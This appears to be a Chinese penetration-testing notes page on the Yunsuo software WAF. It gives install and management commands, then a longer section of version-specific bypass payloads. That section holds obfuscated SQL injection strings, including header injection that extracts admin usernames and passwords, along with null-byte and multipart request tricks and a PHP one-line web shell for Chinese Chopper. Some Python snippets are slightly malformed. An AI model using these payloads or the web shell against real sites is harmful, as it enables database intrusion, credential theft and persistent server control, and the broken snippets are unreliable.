应用安全-安全设备-Waf系列-软Waf-云锁

安装

安装 - Linux

前提：
检查selinux状态 - 关闭selinux
getenforce    #显示为disabled则为关闭

1.下载
x86：wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install

x64：wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install && 
 
2.解压
chmod +x yunsuo_install/install

3.在当前路径下执行安装
yunsuo_install/install    

4.添加服务器到云中心。
 /usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd
注：cloud_name：云中心账户名；cloud_passwd：云中心登录密码

5.查看状态

ps -ef | grep yunsuo_agent

相关命令
云锁启动/停止/重启/运行状态
service yunsuo start/stop/restart/status
/etc/init.d/yunsuo start/stop/restart/status

卸载
/usr/local/yunsuo_agent/uninstall

安装 - Windos

下载
http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe

免杀

GET POST转换 + 空格替换

针对过滤不完全情况

搜索框 + SQL注入 + 字符型

?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

union select  +  ()绕过

?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)

union select + '' + /**/ + ) + # 绕过

?id='/*')union select user,database() from users%23*/&submit=Submit#

IIS + 字符编码绕过 - unicode

asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0

WideChar和MultiByte字符转换问题 - 2002年

一句话 + 菜刀 绕过

<?php<br>
$_REQUEST['a']($_REQUEST['b']);<br>
?>

1.3.145版本 - 包冗余绕过

超过7250byte的部分不被检测

1.3.145版本 - \x00 绕过

GET型
def getdata(n):
    data = 'name=\x00test'
    data += '&id=select 1 from table'
    return data

POST型
def postdata(n)
    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '------'WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '%27abcd\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'
    data += 'select 1 from table\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    return data

COOKIE型
header = {
    'User-Agent' : 'letmetest',
    'Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'
    'X-forwarded-For' : 'select 1 from table'
}

1.3.145版本 - E0绕过

?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#

1.3.191版本 - E0 + /**/ + current_user 绕过

?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

1.4.121版本 - 默认对post、cookie不检测，对header字段未做防护

Header头 - Client-ip注入
Client-ip: 1.2.3.4     'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),
(SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables
GROUP by a)b) or @ `'` and ''='